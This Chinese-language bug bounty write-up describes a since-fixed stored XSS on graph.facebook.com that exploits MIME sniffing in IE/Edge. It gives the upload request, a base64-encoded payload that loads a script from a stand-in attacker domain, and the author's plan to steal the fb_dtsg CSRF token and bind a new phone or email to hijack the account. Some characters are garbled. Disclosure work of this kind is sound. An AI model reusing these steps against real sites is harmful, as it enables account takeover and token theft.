漏洞情況
該漏洞只在ie和edge瀏覽器中有效,漏洞原因在于graph.facebook.com中的某些api端點,在處理html代碼響應時未實施完善安全的轉義措施。響應消息存在于JSon格式中,html代碼被當做其中一個字段的值也包含在內,而且響應消息不附帶content-type 或 x-content-type-options頭,這樣我就能有機會在ie/edge中構造代碼執行了。
(這兩類瀏覽器會掃描整個頁面確定MIME文件類型,而其它瀏覽器只檢查前幾個字符)。
漏洞復現
1、首先,我們發送以下上傳方式的POST請求:
POST?/app/uploadsHost:?graph.facebook.com?access_Token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD
其中的ACCESS_TOKEN是由Facebook for android的第一方應用生成的有效用戶訪問令牌,PAYLOAD則是我們想插入的HTML代碼,用于后續引誘受害者在瀏覽器中執行。當提交請求后,遠程服務端會返回一個類似如下的值,其中包含一個后續會用到的會話ID(具體請參考Facebook官方說明):
{"id":?"upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"}
經測試發現,其響應消息中沒有內容安全策略(CSP)限制,所以,我想到了能不能用一個包含外部鏈接的js文件來插入HTML代碼,例如:
<script></script>
2、這里的上傳請求被Facebook后端做了Base64編碼處理,返回顯示如下,其中包含了我們特意植入的Payload:
upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48 Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s
所以,用該編碼串之后就會有如下請求,用它可以向Facebook發起POST請求:
https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD? 0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?s ig=ARaCDqLfwoeI8V3s
3、由此,利用以上請求串,我向其中加入我在第1步中生成的有效access_token,構造了一個HTML網頁放到了我的網站中:
該頁面包含了一個提交樣式,受害者訪問之后的響應消息如下:
{“h”:”2::<script></script>:GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugb AAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg”}
重要的是,https://DOMAIN.com/script.js中的腳本文件將幫助我竊取受害者的“fb_dtsg” csrf token,并且可向https://www.facebook.com/api/graphql/發送一個添加手機號或郵箱地址的綁定請求,實現間接的受害者賬戶劫持。
漏洞修復
1、在file_type參數中加入對HTML代碼處理的安全轉義措施; 2、給每個響應中加入“Content-type:?application/json”?頭避免進一步的攻擊。 漏洞上報及處理進程 2019.10.10???漏洞初報 2019.10.10???Facebook確認 2019.10.11????Facebook修復 2019.10.24???Facebook獎勵5000$
相關文章教程推薦:網站安全教程
